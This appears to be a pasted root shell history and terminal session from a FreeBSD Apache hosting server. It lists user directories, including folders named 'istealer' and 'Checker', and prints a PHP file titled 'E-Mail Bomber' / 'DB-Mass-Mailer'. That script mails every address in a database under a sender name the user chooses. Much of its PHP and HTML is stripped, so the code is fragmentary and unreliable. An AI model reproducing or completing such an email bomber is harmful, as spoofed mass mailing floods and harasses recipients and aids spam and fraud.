/home/forsirius/testsite15.w2c.ru +ls -la +grep testsite.w2c.ru /usr/local/etc/apache22/vhosts/* +grep w2c.ru /usr/local/etc/apache22/vhosts/* +cd /home/forsirius/testsite15.w2c.ru +ls -la +ifconfig +cd .. +ls -la +cd .. +ls -la +mc +cd /home/forsirius/testsite.w2c.ru +grep w2c.ru /usr/local/etc/apache22/vhosts/* +ifconfig +cat /etc/rc.conf +cat /etc/rc.conf +ifconfig +cat /etc/rc.conf +cat /etc/rc.local +cat /etc/rc.local +cat /etc/rc.conf +cd /home/224422/ +ls -[la +ls -la +cd 224422.w2c.ru/ +ls -la +ls -la +cat index.php +cd inn +cd inc +ls -la +cd .. +ls -la +ls -la pwd +ls -la adm +date +ntpdate -v -b in.pool.ntp.org +ntpdate -v -b pool.ntp.org +date 0037 +date +date --help +date +mc +ps ax +/usr/local/etc/rc.d/apache22 start +ps ax +ps ax +ps ax +/usr/local/etc/rc.d/apache22 restart +mc +/usr/local/etc/rc.d/apache22 restart +top +/usr/local/etc/rc.d/apache22 restart +top -S +netstat +top -S +tcpdump +exit +/usr/local/etc/rc.d/apache22 restart +exit +ps ax +exit +cat /usr/local/etc/apache22/vhosts/hackerzhub.conf +cat /usr/local/etc/apache22/vhosts/secunet.conf +history | grep php +ee /usr/local/etc/php.ini +tail -100 /var/log/httpd/httpd_access.log +grep hackbase.cc /usr/local/etc/apache22/vhosts/* +cd /home/webserver/hackbase.cc +ls -la +ee info.php +ee /usr/local/etc/php-apache.ini +/usr/local/etc/rc.d/apache22 reload +/usr/local/etc/rc.d/apache22 reload +/usr/local/etc/rc.d/apache22 restart +nslookup +nslookup +exit + +# cd /home + +# ls -la +total 36 +drwxr-x--x 9 root wheel 512 Oct 14 00:41 . +drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. +drwxrwxr-x 4 224422 www 512 Oct 9 20:19 224422 +drwxr-x--- 5 4004 www 512 Oct 8 18:55 4004 +drwxr-x--- 10 hbstream www 512 Oct 9 19:37 hbstream +drwxr-x--- 5 secunet www 512 Jul 6 21:14 secunet +drwxr-x--- 3 testserver www 512 Sep 21 18:11 testserver +drwxr-x--- 3 testsite www 512 Sep 2 06:55 testsite +drwxr-xr-x 6 webserver www 512 Oct 14 00:37 webserver + +# cd 224422 + +# ls +224422.w2c.ru temp + +# ls -la +total 16 +drwxrwxr-x 4 224422 www 512 Sep 18 18:05 . +drwxr-x--x 9 root wheel 512 Sep 30 10:52 .. +drwxrwx--- 4 224422 www 512 Sep 20 18:24 224422.w2c.ru +drwxrwx--- 2 224422 www 2048 Sep 20 15:04 temp + +# cd 224422.w2c.ru + +# ls -la +total 36 +drwxrwx--- 6 224422 www 512 Oct 18 17:58 . +drwxrwxr-x 4 224422 www 512 Oct 9 20:19 .. +drwxrwxrwx 3 224422 www 1024 Sep 18 17:26 Checker +-rw-r--r-- 1 224422 www 1034 Sep 20 18:24 index.html +drwxr-xr-x 11 224422 www 512 Sep 19 17:36 istealer +-rw-r--r-- 1 224422 www 2704 Oct 18 17:58 mail.php +drwxrwxrwx 2 224422 www 512 Oct 13 21:46 test +drwxrwxrwx 3 224422 www 512 Oct 13 21:41 test2 + +# cat mail.php + + + + + + + + + + +E-Mail Bomber + + +email, $bom, $anon, $von); + if($mail == TRUE){ + echo $row->email . " hat EMail erhalten."."
";} + else{ + echo $row->email . " hat keine Email erhalten."."
";} + } +} +?> +
######################################
+##########-DB-Mass-Mailer--###########
+#################-by-#################
+##############--bebop--###############
+######################################

+
+ + + + + + + +
Email-Liste:
Betreff:
+ +
von:
+ +